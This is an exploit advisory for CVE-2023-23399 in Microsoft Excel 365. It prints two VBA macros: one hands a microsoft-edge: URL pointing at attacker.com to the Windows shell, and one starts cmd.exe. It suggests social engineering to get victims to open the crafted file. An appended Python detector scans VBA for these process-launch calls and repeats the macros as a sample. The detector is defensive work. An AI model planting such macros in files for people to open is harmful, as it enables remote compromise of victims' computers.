## Exploit Title: Microsoft Excel 365 MSO (Version 2302 Build 16.0.16130.20186) 64-bit - Remote Code Execution (RCE)
## Exploit Author: nu11secur1ty
## Date: 03.16.2023
## Vendor: https://www.microsoft.com/en-us/microsoft-365/excel
## Software: https://www.microsoft.com/en-us/microsoft-365/excel
## Reference: https://www.invicti.com/learn/remote-code-execution-rce/
## CVE ID: CVE-2023-23399

## Description:
A malicious user can exploit the victim's PC remotely. For example, when the score indicates that the Attack Vector is Local and User Interaction is Required, this could describe an exploit in which an attacker, through social engineering, convinces a victim to download and open a specially crafted file from a website, which leads to a local attack on their computer.

STATUS: HIGH Vulnerability

[+]Exploit0:
```
Sub Check_your_salaries()
    ' Hands a microsoft-edge: URI to the Windows shell, which opens the URL in Edge
    CreateObject("Shell.Application").ShellExecute "microsoft-edge:https://attacker.com"
End Sub
```

[+]Exploit1:
```
Sub cmd()
    Dim Program As String
    Dim TaskID As Double
    On Error Resume Next
    Program = "cmd.exe"
    ' Starts the program in a normal window through the VBA Shell function
    TaskID = Shell(Program, 1)
    If Err <> 0 Then
        MsgBox "Can't start " & Program
    End If
End Sub
```

## Reproduce:
[href](https://github.com/nu11secur1ty/CVE-mitre/tree/main/2023/CVE-2023-23399)

## Proof and Exploit:
[href](https://streamable.com/dnyfx0)

## Time spent:
03:00:00

--
System Administrator - Infrastructure Engineer
Penetration Testing Engineer
Exploit developer at https://packetstormsecurity.com/, https://cve.mitre.org/index.html and https://www.exploit-db.com/
home page: https://www.nu11secur1ty.com/
hiPEnIMR0v7QCo/+SEH9gBclAAYWGnPoBIQ75sCj60E=
nu11secur1ty
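
For triage of workbooks suspected of carrying macros like Exploit0 and Exploit1, the following is an added detection example, not code from the advisory or its author. It scans already-extracted VBA source text per procedure for the process-launch calls those two macros use. The rule names, function names and the `FormatReport` macro are constructed for illustration, and the second macro is abridged.

```python
import re

# Rule names are constructed; the patterns mirror the calls in the advisory's macros.
RULES = {
    "shell_application_com": re.compile(r'CreateObject\s*\(\s*"Shell\.Application"', re.I),
    "shellexecute_call": re.compile(r'\.ShellExecute\b', re.I),
    "vba_shell_function": re.compile(r'(?<![.\w"])Shell\s*\(', re.I),
    "protocol_handler_url": re.compile(r'"[a-z][a-z0-9+.-]*:https?://', re.I),
}
PROC = re.compile(r'^\s*(?:(?:Public|Private)\s+)?(?:Sub|Function)\s+(\w+)', re.I)

def strip_comment(line):
    """Drop a trailing ' comment, ignoring apostrophes inside string literals."""
    in_string = False
    for i, ch in enumerate(line):
        in_string ^= ch == '"'
        if ch == "'" and not in_string:
            return line[:i]
    return line

def logical_lines(source):
    """Strip comments, then join ' _' continuations so split calls are seen whole."""
    cleaned = "\n".join(strip_comment(l).rstrip() for l in source.splitlines())
    return cleaned.replace(" _\n", " ").splitlines()

def scan_vba(source):
    """Return {procedure name: sorted names of the rules that matched inside it}."""
    findings, current = {}, "<module>"
    for line in logical_lines(source):
        start = PROC.match(line)
        if start:
            current = start.group(1)
        hits = {name for name, rx in RULES.items() if rx.search(line)}
        if hits:
            findings.setdefault(current, set()).update(hits)
    return {proc: sorted(h) for proc, h in findings.items()}

# Constructed sample: the advisory's two macros (second abridged) plus a benign one.
SAMPLE = '''Sub Check_your_salaries()
CreateObject("Shell.Application").ShellExecute "microsoft-edge:https://attacker.com"
End Sub
Sub cmd()
Program = "cmd.exe"
TaskID = Shell(Program, 1)
MsgBox "Can't start " & Program
End Sub
Sub FormatReport()
' Shell("notepad.exe") call removed
End Sub'''
```

The commented-out call in `FormatReport` produces no finding, and the apostrophe in `"Can't start "` is not mistaken for a comment marker.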